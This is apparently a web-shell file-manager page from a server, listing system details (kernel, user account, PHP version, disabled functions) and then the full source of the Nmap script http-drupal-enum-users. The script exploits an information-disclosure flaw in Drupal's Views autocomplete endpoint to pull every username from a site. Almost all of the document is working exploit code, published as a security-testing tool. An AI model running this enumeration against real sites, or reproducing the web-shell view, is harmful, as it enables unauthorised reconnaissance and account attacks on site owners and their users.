Server : Apache/2.4.18 (Ubuntu) System : Linux canvaswebdesign 3.13.0-71-generic #114-Ubuntu SMP Tue Dec 1 02:34:22 UTC 2015 x86_64 User : oppastar ( 1041) PHP Version : 7.0.33-0ubuntu0.16.04.15 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, Directory : /usr/share/nmap/scripts/ |
Upload File : |
local http = require "http" local json = require "json" local shortport = require "shortport" local stdnse = require "stdnse" local table = require "table" description = [[ Enumerates Drupal users by exploiting an information disclosure vulnerability in Views, Drupal's most popular module. Requests to admin/views/ajax/autocomplete/user/STRING return all usernames that begin with STRING. The script works by iterating STRING over letters to extract all usernames. For more information,see: * http://www.madirish.net/node/465 ]] --- -- @usage -- nmap --script=http-drupal-enum-users --script-args http-drupal-enum-users.root="/path/" <targets> -- -- @output -- PORT STATE SERVICE REASON -- 80/tcp open http syn-ack -- | http-drupal-enum-users: -- | admin -- | alex -- | manager -- |_ user -- -- @args http-drupal-enum-users.root base path. Defaults to "/" author = "Hani Benhabiles" license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = {"discovery", "intrusive"} portrule = shortport.http action = function(host, port) local root = stdnse.get_script_args(SCRIPT_NAME .. ".root") or "/" local character, allrequests,user local result = {} -- ensure that root ends with a trailing slash if ( not(root:match(".*/$")) ) then root = root .. "/" end -- characters that usernames may begin with -- + is space in url local characters = "abcdefghijklmnopqrstuvwxyz.-123456789+" for character in characters:gmatch(".") do -- add request to pipeline allrequests = http.pipeline_add(root.. 'admin/views/ajax/autocomplete/user/' .. character, nil, allrequests, "GET") end -- send requests local pipeline_responses = http.pipeline_go(host, port, allrequests) if not pipeline_responses then stdnse.debug1("No answers from pipelined requests") return nil end for i, response in pairs(pipeline_responses) do if response.status == 200 then local status, info = json.parse(response.body) if status then for _,user in pairs(info) do if user ~= "Anonymous" then table.insert(result, user) end end end end end return stdnse.format_output(true, result) end